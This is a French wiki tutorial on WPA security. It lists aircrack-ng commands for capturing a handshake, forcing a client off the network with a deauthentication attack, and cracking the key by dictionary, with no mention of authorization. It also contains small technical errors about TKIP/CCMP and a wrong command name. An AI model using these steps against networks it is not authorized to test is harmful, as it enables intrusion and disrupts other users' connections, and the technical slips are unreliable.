Outils pour utilisateurs

Outils du site


reseau:recuperer_un_handshake_wpa

WPA

Wi-Fi Protected Access (WPA et WPA2) est un mécanisme pour sécuriser les réseaux sans-fil de type Wi-Fi. Le WPA était une norme temporaire pour palier au manque de sécurité du WEP. La norme a été implémentée dans l'idée d'être remplacée rapidement par le WPA2.

Elle utilise deux types d'authentifications :

- TKIP (Temporal Key Integrity Protocol) : une clé de 128 bits est utilisée pour chaque paquet. On génère une nouvelle clé pour chaque paquet.

- CCMP : un mécanisme de chiffrement qui s'appuie sur AES et qui est plus robuste que le TKIP.

Vocabulaire utilisé :

- BSSID : est l'adresse mac du point d'accès wifi.

- ESSID : est le nom du réseau wifi (exemple: Bbox-AFXXX)

- Handshake : est un échange de clé entre un routeur wifi et un client.

- Channel : est le canal sur lequel est diffusé le réseau wifi.

Sur les réseaux des particuliers le WPA-PSK est utilisé (Preshared key).

LE WPA-PSK utilise le TKIP comme authentification.

Exploitation

Pour commencer, assurez vous que votre carte wifi supporte le monitoring.

Pour l'activer :

airmon-ng start wlan0

Dans mon cas wlan0 est mon interface wifi.

Nous allons ensuite lister les wifi en WPA :

airodump-ng --encrypt wpa mon0 

–encrypt permet de filtrer les réseaux wifi par chiffrement

mon0 est notre interface de monitoring

Pour obtenir un station :

airodump-ng -a -c [chan] --bssid [APmac] -w [outfile][iface]

Dès qu'une station apparait :

aireplay-ng -0 1 -e [ESSID] -a [BSSID] -c [Client MAC] [iface]

augmenter le 1 si ça n'a pas suffit à obtenir un handshake.

Pour vérifier si le handshake est capturé ,lancez

aircrack-ng outfile.cap

pour obtenir la clé :

aircrack -w dictionnaire -b [bssid] outfile.cap 
reseau/recuperer_un_handshake_wpa.txt · Dernière modification: 2016/07/04 08:38 (modification externe)